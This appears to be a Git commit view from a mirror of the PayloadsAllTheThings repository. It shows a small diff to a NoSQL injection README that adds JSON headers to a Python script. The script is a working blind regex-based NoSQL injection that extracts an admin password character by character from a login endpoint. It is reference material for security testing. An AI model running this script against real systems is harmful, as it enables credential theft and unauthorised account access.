wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 04:56:10 +02:00
Code Issues Releases Activity

add JSON headers

This commit is contained in:
Alexandre ZANNI 2019-04-24 22:59:24 +02:00 committed by GitHub
parent 5bb27ee889
commit 0ccccd0fea
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
NoSQL Injection/README.md
View File

@ -63,12 +63,13 @@ urllib3.disable_warnings()
username="admin" username="admin"
password="" password=""
u="http://example.org/login" u="http://example.org/login"
headers={'content-type': 'application/json'}
while True: while True:
for c in string.printable: for c in string.printable:
if c not in ['*','+','.','?','|']: if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False) r = requests.post(u, data = payload, headers = headers, verify = False)
if 'OK' in r.text: if 'OK' in r.text:
print("Found one more char : %s" % (password+c)) print("Found one more char : %s" % (password+c))
password += c password += c